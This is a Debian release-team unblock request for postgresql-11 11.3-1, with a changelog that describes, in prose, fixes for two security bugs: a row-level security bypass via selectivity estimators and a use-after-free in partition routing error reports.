Package: release.debian.org
Severity: normal
User: release.debian....@packages.debian.org
Usertags: unblock
Please unblock package postgresql-11. The new version fixes two
security bugs, and various other issues. (This is a new upstream minor
release, which would have pushed by the security team if buster was
already released.)
unblock postgresql-11/11.3-1
Christoph
postgresql-11 (11.3-1) unstable; urgency=medium
* New upstream version.
+ Prevent row-level security policies from being bypassed via selectivity
estimators (Dean Rasheed)
Some of the planner's selectivity estimators apply user-defined
operators to values found in pg_statistic (e.g., most-common values).
A leaky operator therefore can disclose some of the entries in a data
column, even if the calling user lacks permission to read that column.
In CVE-2017-7484 we added restrictions to forestall that, but we failed
to consider the effects of row-level security. A user who has SQL
permission to read a column, but who is forbidden to see certain rows
due to RLS policy, might still learn something about those rows'
contents via a leaky operator. This patch further tightens the rules,
allowing leaky operators to be applied to statistics data only when
there is no relevant RLS policy. (CVE-2019-10130)
+ Avoid access to already-freed memory during partition routing error
reports (Michael Paquier)
This mistake could lead to a crash, and in principle it might be
possible to use it to disclose server memory contents. (CVE-2019-10129)
-- Christoph Berg <m...@debian.org> Tue, 07 May 2019 12:04:34 +0200
